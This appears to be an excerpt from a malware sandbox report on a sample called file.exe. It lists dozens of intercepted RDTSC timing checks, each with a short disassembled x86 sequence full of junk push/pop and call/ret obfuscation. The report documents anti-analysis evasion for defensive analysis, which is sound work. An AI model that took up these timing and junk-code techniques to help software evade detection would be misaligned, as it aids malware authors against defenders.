Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62BDAC second address: 62BDB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62C55C second address: 62C561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62C561 second address: 62C567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62C567 second address: 62C56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62E857 second address: 62E869 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 je 00007F79111F4F00h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62FDFB second address: 62FE18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62F17C second address: 62F182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 631248 second address: 63124C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63124C second address: 63125B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6312E4 second address: 6312EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 631CC8 second address: 631CEA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79111F4F05h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63545C second address: 635474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F79113F0796h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F79113F0796h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 635474 second address: 63547E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F79111F4EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63547E second address: 6354E3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sbb di, 4008h 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D2CAEh] 0x0000001a mov dword ptr [ebp+122D3244h], ecx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F79113F0798h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov bx, dx 0x0000003f xchg eax, esi 0x00000040 jng 00007F79113F07AAh 0x00000046 jnl 00007F79113F07A4h 0x0000004c push eax 0x0000004d push esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 pop esi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 630FE1 second address: 630FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 630FE5 second address: 630FEF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63853B second address: 638541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638541 second address: 638599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F79113F07E4h 0x0000000f pushad 0x00000010 jmp 00007F79113F07A1h 0x00000015 jmp 00007F79113F079Eh 0x0000001a jmp 00007F79113F07A9h 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638599 second address: 63859D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63859D second address: 6385A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63ABFF second address: 63AC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63AC08 second address: 63AC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63AC0E second address: 63AC1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638CDE second address: 638CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63AC1E second address: 63AC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638CE4 second address: 638CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63B2A4 second address: 63B2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F79111F4EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63B2AE second address: 63B2C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63B2C1 second address: 63B2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63B2C5 second address: 63B2CB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63B2CB second address: 63B2D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63B2D1 second address: 63B2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63B2D5 second address: 63B2D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63B3D8 second address: 63B3DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63C334 second address: 63C338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63D1BB second address: 63D1C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63C3EC second address: 63C409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63C409 second address: 63C40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63E1AA second address: 63E1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63E1B2 second address: 63E1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F79113F079Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63E1C3 second address: 63E1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63F262 second address: 63F267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63F267 second address: 63F2CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F79111F4EF6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f call 00007F79111F4EFBh 0x00000014 mov edi, dword ptr [ebp+122D395Eh] 0x0000001a pop ebx 0x0000001b push 00000000h 0x0000001d call 00007F79111F4F02h 0x00000022 or di, F500h 0x00000027 pop edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F79111F4EF8h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 movsx edi, dx 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63F2CC second address: 63F2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63F2D7 second address: 63F2E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 640233 second address: 640239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 640239 second address: 640277 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F79111F4F06h 0x00000010 push 00000000h 0x00000012 mov bl, ABh 0x00000014 adc edi, 6A4BC6F3h 0x0000001a push 00000000h 0x0000001c sub ebx, dword ptr [ebp+122D2B2Ah] 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jo 00007F79111F4EF8h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6411E3 second address: 6411E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6411E7 second address: 6411ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6411ED second address: 64124A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F79113F0796h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 pop ebx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F79113F0798h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr [ebp+1247CC7Ah], edi 0x00000036 push ebx 0x00000037 mov dword ptr [ebp+122D30AAh], eax 0x0000003d pop ebx 0x0000003e push 00000000h 0x00000040 and bx, 8F40h 0x00000045 push 00000000h 0x00000047 mov edi, dword ptr [ebp+1245F863h] 0x0000004d push eax 0x0000004e js 00007F79113F07A4h 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6421AD second address: 642237 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F79111F4EF8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F79111F4EF6h 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F79111F4F07h 0x00000020 popad 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F79111F4EFCh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F79111F4EF8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov dword ptr [ebp+1247CF12h], esi 0x0000004a push 00000000h 0x0000004c add dword ptr [ebp+122D188Fh], eax 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F79111F4F07h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6431F6 second address: 6431FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642498 second address: 6424A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F79111F4EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6444AA second address: 644571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F79113F07A3h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F79113F07A5h 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D1C3Bh] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F79113F0798h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D1DBCh], ecx 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 xor edi, 6C679A92h 0x0000004c mov eax, dword ptr [ebp+122D064Dh] 0x00000052 push 00000000h 0x00000054 push edx 0x00000055 call 00007F79113F0798h 0x0000005a pop edx 0x0000005b mov dword ptr [esp+04h], edx 0x0000005f add dword ptr [esp+04h], 00000018h 0x00000067 inc edx 0x00000068 push edx 0x00000069 ret 0x0000006a pop edx 0x0000006b ret 0x0000006c mov edi, dword ptr [ebp+122D2E16h] 0x00000072 mov di, dx 0x00000075 push FFFFFFFFh 0x00000077 pushad 0x00000078 mov cx, 1766h 0x0000007c movzx ebx, bx 0x0000007f popad 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jg 00007F79113F07A7h 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64553A second address: 64553F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644571 second address: 644577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472C9 second address: 647338 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F79111F4EF8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007F79111F4F02h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F79111F4EF8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+1245F880h], esi 0x00000039 sub dword ptr [ebp+122D323Fh], edx 0x0000003f push 00000000h 0x00000041 jmp 00007F79111F4F05h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push esi 0x0000004b pop esi 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644577 second address: 64457B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647338 second address: 64733C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64733C second address: 647346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64953B second address: 649547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C60E second address: 64C61C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EE1F second address: 64EE28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EE28 second address: 64EE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65140A second address: 65140E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6543FD second address: 654417 instructions: 0x00000000 rdtsc 0x00000002 js 00007F79113F07A5h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654563 second address: 65457A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F79111F4EFCh 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654709 second address: 65470D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65470D second address: 654719 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79111F4EF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654719 second address: 654724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F79113F0796h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654724 second address: 654740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F02h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654740 second address: 654753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jnp 00007F79113F07B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654753 second address: 654765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F79111F4EF6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6548F2 second address: 6548F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A562 second address: 65A566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A566 second address: 65A586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jnc 00007F79113F079Eh 0x0000000e jp 00007F79113F0798h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A586 second address: 65A58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A58C second address: 65A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A590 second address: 65A5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edi 0x0000000b jnl 00007F79111F4EFCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A5A3 second address: 65A5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65A5B1 second address: 65A5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661C70 second address: 661C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661C74 second address: 661C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661C78 second address: 661C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F79113F079Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661C90 second address: 661C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6623BE second address: 6623C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667EEA second address: 667F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79111F4F08h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
